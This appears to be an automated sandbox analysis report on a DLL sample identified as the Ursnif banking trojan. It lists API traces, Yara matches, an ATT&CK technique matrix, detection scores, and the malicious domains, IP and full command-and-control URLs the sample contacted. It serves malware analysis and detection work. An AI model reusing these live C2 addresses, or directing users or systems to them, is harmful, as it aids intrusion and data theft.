Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0312C420 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DD81983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0313FF06 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DD81262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	Valid Accounts1	Valid Accounts1	Obfuscated Files or Information1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Masquerading1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Process Injection713	Valid Accounts1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	System Information Discovery45	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion21	LSA Secrets	Virtualization/Sandbox Evasion21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection713	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
worVoBJYGD.dll	3%	Virustotal		Browse
worVoBJYGD.dll	4%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.1350000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
4.2.rundll32.exe.d90000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
gtr.antoinfer.com	12%	Virustotal		Browse
app.flashgameo.at	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://gtr.antoinfer.com/FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F	100%	Avira URL Cloud	malware
http://gtr.antoinfer.com/08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw	100%	Avira URL Cloud	malware
http://gtr.antoinfer.com/mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8	100%	Avira URL Cloud	malware
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://gtr.antoinfer.com/DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtr.antoinfer.com	185.228.233.17	true	true	12%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
app.flashgameo.at	185.228.233.17	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F	true	Avira URL Cloud: malware	unknown
http://gtr.antoinfer.com/08OjUeXqnP9/J746P5EGkluNVd/IJ_2B0pRlg5g_2Fpunyf_/2BXLVHvYLaERgrs5/6QTGZHoxYTnKCap/ZPQAuenP_2FyJ6hWxg/pWql_2F5l/kLJRoq5u3UoR4652KiHp/EmofwTCfdG6EODl70rf/KEalVhNFb6NVkmQGTmfz_2/B7kttRIp_2Bne/TjMfdOpf/19l29_2BHFRm1Q66bkvKZWZ/DZZfqXshBY/y14LEgOTtytG3Ix8L/xeX8bRPtnh6u/r2W_2BXkRqN/peDwoZDDU11DTW/WVHbt8_2BPQcYfD7tFwK0/zJnaF28QV4LV_2F7/vA9Gd_2F8SeHe3M/sh52_2Bep9d5h/oiu8Z2yw	true	Avira URL Cloud: malware	unknown
http://gtr.antoinfer.com/mTRcVo1kR/Y_2FA_2BfssGFqVyATv2/Ha48GIz6nIiYpIeUH4v/_2FG2EmK4VeNaMJVBDrk0J/_2B1TzmrJnGIJ/nya_2F8I/cdZf2M97sVJPBZwkgGorhXf/mRYeY9vLlb/ql65kRpFXqGZwBQer/rXMufQHq_2FU/nIy69w6PhML/8J3AhNFQ4Jy96G/w5vhfh_2BIJ7d9IoLb98y/oKxTbr81HhqnJ1L1/Jh1VS63mbokZ6cg/EiF4xFifMJVfOHV2Q_/2FlZvyJ76/jzog_2BoRPm_2FGOWmRI/FPnBmD_2BoCBmqUOVLw/rpKEm_2F86qO2njAFbe3qJ/1v9sWMzqblkv_/2F_2BDgW007d7/LtA8	true	Avira URL Cloud: malware	unknown
http://gtr.antoinfer.com/DeX5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txt	loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp	false		high
https://contoso.com/	powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	loaddll32.exe, 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, control.exe, 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000013.00000002.523197029.0000020480001000.00000004.00000001.sdmp, powershell.exe, 00000019.00000002.552701952.0000011326AA1000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.228.233.17	gtr.antoinfer.com	Russian Federation		64439	ITOS-ASRU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458873
Start date:	03.08.2021
Start time:	20:24:22
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 43s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	worVoBJYGD.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@41/36@9/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.1% (good quality ratio 13.5%) Quality average: 80.2% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 23.211.6.115, 23.211.4.86, 51.103.5.159, 52.255.188.83, 20.82.210.154, 52.147.198.201, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:26:09	API Interceptor	4x Sleep call for process: rundll32.exe modified
20:26:22	API Interceptor	3x Sleep call for process: loaddll32.exe modified
20:26:34	API Interceptor	110x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.228.233.17	wuxvGLNrxG.jar	Get hash	malicious	Browse
	v8MaHZpVOY2L.vbs	Get hash	malicious	Browse
	beneficial.dll	Get hash	malicious	Browse
	mental.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	wuxvGLNrxG.jar	Get hash	malicious	Browse	208.67.222.222
	v8MaHZpVOY2L.vbs	Get hash	malicious	Browse	208.67.222.222
	beneficial.dll	Get hash	malicious	Browse	208.67.222.222
	2790000.dll	Get hash	malicious	Browse	208.67.222.222
	2770174.dll	Get hash	malicious	Browse	208.67.222.222
	3a94.dll	Get hash	malicious	Browse	208.67.222.222
